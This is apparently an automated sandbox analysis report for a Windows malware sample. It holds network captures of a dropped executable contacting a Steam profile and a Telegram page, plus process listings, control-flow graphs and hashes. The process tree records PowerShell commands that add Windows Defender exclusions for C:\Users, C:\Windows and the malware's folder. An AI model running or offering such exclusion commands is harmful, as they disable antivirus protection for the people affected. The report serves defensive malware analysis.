                                                                                                                                                                                                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 08:02:31 GMT
                                                                                                                                                                                                                    Content-Length: 35590
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-12-23 08:02:31 UTC14651INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                    2024-12-23 08:02:32 UTC16384INData Raw: 09 09 09 09 09 09 4d 61 72 6b 65 74 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74
                                                                                                                                                                                                                    Data Ascii: Market</a><a class="submenuitem" href="https://steamcommunity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About
                                                                                                                                                                                                                    2024-12-23 08:02:32 UTC3584INData Raw: 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6c 65 76 65 6c 5f 62 74 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 70 72 6f 66 69 6c 65 73 2f 37 36 35 36 31 31 39 39 38 30 34 33 37 37 36 31 39 2f 62 61 64 67 65 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6c 65 76 65 6c 22 3e 4c 65 76 65 6c 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 72 69 65 6e 64 50 6c 61 79 65 72 4c 65 76 65 6c 20 6c 76 6c 5f 30 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 72 69 65 6e 64 50 6c 61 79 65 72 4c 65 76 65 6c 4e 75 6d 22 3e 30 3c
                                                                                                                                                                                                                    Data Ascii: OnActivate&quot;:true}" class="persona_level_btn" href="https://steamcommunity.com/profiles/76561199804377619/badges"><div class="persona_name persona_level">Level <div class="friendPlayerLevel lvl_0"><span class="friendPlayerLevelNum">0<
                                                                                                                                                                                                                    2024-12-23 08:02:32 UTC971INData Raw: 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 6c 69 6e 6b 66 69 6c 74 65 72 2f 3f 75 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 20 6e 6f 6f 70 65 6e 65 72 22 3e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 3c 2f 61 3e 2e 09 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 76 61 6c 76 65 5f 6c 69 6e 6b 73 22 3e 0a 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 70 72 69 76 61 63 79 5f 61 67 72 65 65 6d 65 6e 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 50 72 69
                                                                                                                                                                                                                    Data Ascii: "https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org" target="_blank" rel=" noopener">geonames.org</a>.<br><span class="valve_links"><a href="http://store.steampowered.com/privacy_agreement/" target="_blank">Pri


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    8192.168.2.450013149.154.167.994437672C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-12-23 08:03:05 UTC144OUTGET /m3wm0w HTTP/1.1
                                                                                                                                                                                                                    Host: t.me
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    Cookie: stel_ssid=5f4e6102837bcdeed2_14960932722618837155
                                                                                                                                                                                                                    2024-12-23 08:03:06 UTC368INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 08:03:06 GMT
                                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                    Content-Length: 9539
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                    Cache-control: no-store
                                                                                                                                                                                                                    X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                    Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                    Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                    2024-12-23 08:03:06 UTC9539INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6d 33 77 6d 30 77 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @m3wm0w</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                    Start time:03:00:11
                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\YYjRtxS70h.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\YYjRtxS70h.exe"
                                                                                                                                                                                                                    Imagebase:0x950000
                                                                                                                                                                                                                    File size:13'793'970 bytes
                                                                                                                                                                                                                    MD5 hash:5A59CE92B07DE68C0BE8FBD7944214E2
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:1
                                                                                                                                                                                                                    Start time:03:00:11
                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                                    Start time:03:00:16
                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\spxzLeEJs'"
                                                                                                                                                                                                                    Imagebase:0x5c0000
                                                                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                    Start time:03:00:16
                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                    Start time:03:00:16
                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\spxzLeEJs
                                                                                                                                                                                                                    Imagebase:0x5c0000
                                                                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                                    Start time:03:00:28
                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                                                                                                                                                                                                                    Imagebase:0x5c0000
                                                                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                                    Start time:03:00:28
                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                                    Start time:03:00:29
                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
                                                                                                                                                                                                                    Imagebase:0x5c0000
                                                                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:12
                                                                                                                                                                                                                    Start time:03:00:44
                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
                                                                                                                                                                                                                    Imagebase:0x5c0000
                                                                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:13
                                                                                                                                                                                                                    Start time:03:00:44
                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                                    Start time:03:00:45
                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
                                                                                                                                                                                                                    Imagebase:0x5c0000
                                                                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                                                    Start time:03:01:13
                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                    Path:C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe"
                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                    File size:476'160 bytes
                                                                                                                                                                                                                    MD5 hash:F453C5F8C736FF8C381E7022CAD85E3E
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                    • Detection: 63%, ReversingLabs
                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                      Execution Coverage:22.8%
                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                                      Total number of Nodes:3
                                                                                                                                                                                                                      Total number of Limit Nodes:0
                                                                                                                                                                                                                      execution_graph 2549 2ad1170 2550 2ad11b2 GetConsoleWindow 2549->2550 2551 2ad11f2 2550->2551

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 64 2ad0a40-2ad0a68 65 2ad0a6f-2ad0ac5 call 2ad10e0 call 2ad1317 64->65 66 2ad0a6a 64->66 69 2ad0ad5-2ad0ccc 65->69 70 2ad0ac7-2ad0ad0 65->70 66->65 102 2ad0daf-2ad0dc3 69->102 73 2ad1091-2ad10d6 70->73 103 2ad0dc9-2ad0dde 102->103 104 2ad0cd1-2ad0d17 102->104 107 2ad0e5b-2ad0e77 103->107 108 2ad0d1e-2ad0d51 104->108 109 2ad0d19 104->109 110 2ad0e7d-2ad0e95 107->110 111 2ad0de0-2ad0e1f 107->111 115 2ad0d58-2ad0dac 108->115 116 2ad0d53 108->116 109->108 112 2ad0ede-2ad0f1c call 2ad013c 110->112 113 2ad0e97-2ad0edb 110->113 120 2ad0e26-2ad0e3e 111->120 121 2ad0e21 111->121 132 2ad0f24-2ad0fa2 call 2ad014c 112->132 113->112 115->102 116->115 129 2ad0e46-2ad0e58 120->129 121->120 129->107 139 2ad102e-2ad1036 132->139 140 2ad0fa8-2ad102c 132->140 143 2ad1037-2ad1038 139->143 140->143 143->73
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.3414898150.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2ad0000_YYjRtxS70h.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: a^q
                                                                                                                                                                                                                      • API String ID: 0-3411664965
                                                                                                                                                                                                                      • Opcode ID: cf2e3a6f105cc7f77dfa74734452bcbdcef69bf97b2eb615fdc41e3fc11791b1
                                                                                                                                                                                                                      • Instruction ID: e30e2aaa21d2e5ab1d363bc3a82a2a700a79a9b8113a9db32d23e32d3f37c2f7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cf2e3a6f105cc7f77dfa74734452bcbdcef69bf97b2eb615fdc41e3fc11791b1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4612A674A01228CFDB14DFA9C984B9DBBB2FF48301F108559E819AB359DB74A985CF50

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 298 2ad2309-2ad2340 299 2ad2347-2ad23d9 298->299 300 2ad2342 298->300 305 2ad25c8-2ad25d1 299->305 300->299 306 2ad23de-2ad23e7 305->306 307 2ad25d7-2ad25de 305->307 308 2ad23ee-2ad24fb call 2ad19ac call 2ad19bc 306->308 309 2ad23e9 306->309 327 2ad24fd-2ad2518 308->327 328 2ad2525-2ad2540 308->328 309->308 331 2ad2520-2ad2523 327->331 333 2ad2541-2ad255c 328->333 331->333 335 2ad255e 333->335 336 2ad2568 333->336 337 2ad2567 335->337 336->305 337->336
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.3414898150.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2ad0000_YYjRtxS70h.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 4c3bbb2f452a3efcaf81cb8aaa3e7893a559663649addda28054c4e5c8e973ef
                                                                                                                                                                                                                      • Instruction ID: f3f71006466d5c7e6265a5a827995c5cfecfd5a143fe11bbc8e9c90cbc90aa2c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c3bbb2f452a3efcaf81cb8aaa3e7893a559663649addda28054c4e5c8e973ef
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B281F674E01208DFDB18DFA5D590AAEBBB2FF89300F209469D805AB354DB359D46CF50

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 151 2ad1168-2ad11aa 153 2ad11b2-2ad11f0 GetConsoleWindow 151->153 154 2ad11f9-2ad1225 153->154 155 2ad11f2-2ad11f8 153->155 155->154
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.3414898150.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2ad0000_YYjRtxS70h.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ConsoleWindow
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2863861424-0
                                                                                                                                                                                                                      • Opcode ID: 0ba7dc552b4e41b6517dc44875fe89e298d4d759931525974f7b7fd7bda90e86
                                                                                                                                                                                                                      • Instruction ID: 6cf5158b16ed0972256a52337850be110df54675a1911539b28cffd05c9e92ad
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ba7dc552b4e41b6517dc44875fe89e298d4d759931525974f7b7fd7bda90e86
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D121B9B4D002189FCB00CFA9D984ADEBBF4BB49320F20806AE809B7251D775A945CFA4

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 158 2ad1170-2ad11f0 GetConsoleWindow 160 2ad11f9-2ad1225 158->160 161 2ad11f2-2ad11f8 158->161 161->160
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.3414898150.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2ad0000_YYjRtxS70h.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ConsoleWindow
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2863861424-0
                                                                                                                                                                                                                      • Opcode ID: d7149dd55e2653c40e368aa3363f6cd2e8d20790da29a65dd209e2f90cf5fee9
                                                                                                                                                                                                                      • Instruction ID: 6325e6aca4f73dc41b65df8df6f558db652a8e70867e2951b73690c0cbde1de7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d7149dd55e2653c40e368aa3363f6cd2e8d20790da29a65dd209e2f90cf5fee9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2321A9B8D002189FCB00DFA9D984ADEFBF4BB49320F20905AE809B7350C735A945CFA4
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.3414238029.000000000110D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0110D000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_110d000_YYjRtxS70h.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 1b58003564442209379355992c7f346cc0b5046478c4b6d3893f99de1f27ae03
                                                                                                                                                                                                                      • Instruction ID: 1808d7b76786efc7b3c18b63818cbd8039e39e515ab692651a53575e4ec9cc34
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1b58003564442209379355992c7f346cc0b5046478c4b6d3893f99de1f27ae03
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D821E571A04204DFDF0ADF98E984B26BF75FB94318F24C569ED090A286C376D416C6A2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.3414238029.000000000110D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0110D000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_110d000_YYjRtxS70h.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                                                                                                                      • Instruction ID: d62ae31a5920a89081ccc32214d64e9e1be26ba97ba0e5138166e6465f307594
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6611CD76904284CFCF06CF44D5C4B16BF72FB84324F24C6A9DC090A296C336D45ACBA2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.3414238029.000000000110D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0110D000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_110d000_YYjRtxS70h.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
